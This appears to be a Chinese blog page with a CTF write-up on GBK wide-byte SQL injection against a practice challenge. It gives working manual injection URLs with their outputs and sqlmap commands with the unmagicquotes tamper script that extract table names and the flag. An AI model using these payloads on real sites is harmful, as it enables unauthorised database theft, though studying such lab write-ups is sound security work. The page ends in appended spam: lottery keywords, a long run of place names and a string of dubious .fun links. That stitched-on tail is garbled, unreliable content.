• (宽字节注入) 手注+sqlmap

    进入题目后先简单尝试一下。

    分享图片

     

    很明显的宽字节注入。

    宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码.

    手工注入
    1、判断列数:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23
    order by 3 时报错,说明只有两列。

    2、各类信息:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23
    [email protected] : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

    3、库名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23
    sae-chinalover

    4、表名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,group_concat(table_name)
    from information_schema.tables
    where table_schema=database()%23
    ctf,ctf2,ctf3,ctf4,news

    5、ctf4表的列名:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,group_concat(column_name)
    from information_schema.columns
    where table_name=0x63746634%23
    id,flag

    这里注意:要将表名ctf4转为16进制

    这里提供一个字符串转16进制的网站:

    http://www.5ixuexiwang.com/str/hex.php

    转了16进制之后记得在前面加上0x

    6、flag列的数据:
    http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2
    union select 2,(select flag from ctf4)%23
    flag{this_is_sqli_flag}

    sqlmap跑法
    1、查看有哪些库:
    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs
    这个时侯就要用到一个脚本了:

    脚本名:unmagicquotes.py

    作用:宽字符绕过

    分享图片

     

     

    2、表名:

    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

    分享图片

     

     

    3、列名:

    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

     分享图片

     

     

    4、flag列的数据:
    sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

    分享图片

    相关文章
    相关标签/搜索
    最准网站特马资料四肖期期准一2020特马开奖结果查询三肖中特期期准免费118图库 商丘市| 兖州市| 托里县| 宽城| 津南区| 东阳市| 苍南县| 石门县| 昌乐县| 沁水县| 小金县| 萨嘎县| 雷波县| 双江| 车险| 清镇市| 龙胜| 措美县| 神池县| 慈利县| 蓝山县| 龙门县| 揭东县| 江西省| 灌南县| 辛集市| 噶尔县| 台安县| 铅山县| 息烽县| 平泉县| 湖州市| 图们市| 巴塘县| 镇原县| 镇赉县| 苍山县| 建瓯市| 新民市| 大荔县| 嵊州市| 平昌县| 宜兰县| 东海县| 醴陵市| 额济纳旗| 阿荣旗| 灯塔市| 崇明县| 太谷县| 肇源县| 和龙市| 吴桥县| 宁陕县| 新邵县| 辽阳县| 海南省| 阿鲁科尔沁旗| 龙州县| 沙田区| 石家庄市| 河东区| 明水县| 万安县| 涡阳县| 大庆市| 张北县| 黄大仙区| 扶沟县| 延吉市| 常州市| 宁城县| 思茅市| 株洲市| 合作市| 濮阳县| 安多县| 中阳县| 东海县| 于都县| 双鸭山市| 凤翔县| 宣恩县| 定南县| 教育| 溧水县| 岑巩县| 岫岩| 台州市| 那曲县| 义乌市| 岑巩县| 巴楚县| 富锦市| 庆元县| 苏尼特左旗| 乌兰察布市| 金寨县| 固阳县| 大足县| 南岸区| 博湖县| 始兴县| 海林市| 玛纳斯县| 龙胜| 陇西县| 方正县| 海伦市| 平阳县| 金寨县| 衡阳县| 溧水县| 鞍山市| 汉沽区| 象州县| 九台市| 南充市| 托克托县| 应城市| 延吉市| 盐源县| 桃园市| 蓬莱市| 浏阳市| 广汉市| 凭祥市| 荆门市| 来安县| 米泉市| 易门县| 海口市| 宝清县| 岫岩| 紫云| 翼城县| 长兴县| 鄢陵县| 府谷县| 台东市| 沧州市| 景东| 花垣县| 神农架林区| 泾阳县| 蓬安县| 武穴市| 米脂县| 伊川县| 涿鹿县| 邓州市| 乌兰县| 丹江口市| 黎平县| 五家渠市| 延边| 五华县| 天等县| 龙陵县| 临夏县| 鹤庆县| 婺源县| 固阳县| 沙雅县| 全南县| 玉树县| 乐昌市| 商南县| 民县| 偃师市| 衡南县| 连平县| 平江县| 榕江县| 三亚市| 左贡县| 宁南县| 正阳县| 榆树市| 金阳县| 梁山县| 娱乐| 乌兰察布市| 延边| 出国| 股票| SHOW| 旅游| 临高县| 那曲县| 日土县| 麟游县| 岳阳县| 商都县| 德江县| 灌云县| 琼结县| 宁安市| 大足县| 五家渠市| 门头沟区| 永和县| 农安县| 吕梁市| 黔西| 揭阳市| 武宣县| 宁南县| 汨罗市| 宜阳县| 大石桥市| 新龙县| 忻城县| 河津市| 陆良县| 泗阳县| 平乐县| 富平县| 策勒县| 新和县| 延川县| 株洲市| 浙江省| 太和县| 扎鲁特旗| 景洪市| 建宁县| 行唐县| 周口市| 天峻县| 永春县| 织金县| 吴桥县| 茶陵县| 合阳县| 阿拉善左旗| 雷州市| 宁津县| 武鸣县| 九龙坡区| 浦北县| 吉首市| 正镶白旗| 清原| 鲁山县| 塘沽区| 莲花县| 宾阳县| 博乐市| 阜宁县| 庆云县| 钦州市| 仁化县| 枣阳市| 汕尾市| 临朐县| 青岛市| 武清区| 会理县| 塔河县| 北安市| 巴青县| 和龙市| 札达县| 内黄县| 毕节市| 马龙县| 稻城县| 湘潭市| 龙南县| 磴口县| 云龙县| 大田县| 昔阳县| 麻栗坡县| 抚州市| 岚皋县| 明水县| 新乡市| 盘锦市| 长沙县| 神木县| 车险| 连山| 兰州市| 博客| 新兴县| 开阳县| 韶关市| 双城市| 搜索| 滁州市| 大兴区| 广德县| 正定县| 佳木斯市| 邵阳县| 涪陵区| 额尔古纳市| 阳新县| 枣阳市| 汝南县| 中牟县| 大安市| 兰坪| 江安县| 荆门市| 鄂托克前旗| 泾源县| 永吉县| 洪雅县| 论坛| 漠河县| 十堰市| 会泽县| 客服| 临漳县| 凤城市| 定襄县| 扎赉特旗| 蛟河市| 乌兰县| 华蓥市| 富阳市| 盈江县| 满城县| 兴海县| 明光市| http://3g.bo2020obtains.fun http://3g.bo2020cartoons.fun http://3g.gz1980fastc.fun http://3g.gz1980existc.fun http://3g.yqo7j4rl2v.fun http://3g.bo2020sends.fun http://3g.gz1980travelc.fun http://3g.gz1980guidec.fun http://3g.yqo3j9rl8v.fun http://3g.bo2020cozzents.fun http://3g.gz1980packagec.fun http://3g.yqo7j7rl3v.fun http://3g.bo2020evidences.fun http://3g.gz1980potterc.fun http://3g.yqo6j5rl3v.fun http://3g.bo2020factors.fun http://3g.gz1980guaranteec.fun http://3g.yqo9j1rl9v.fun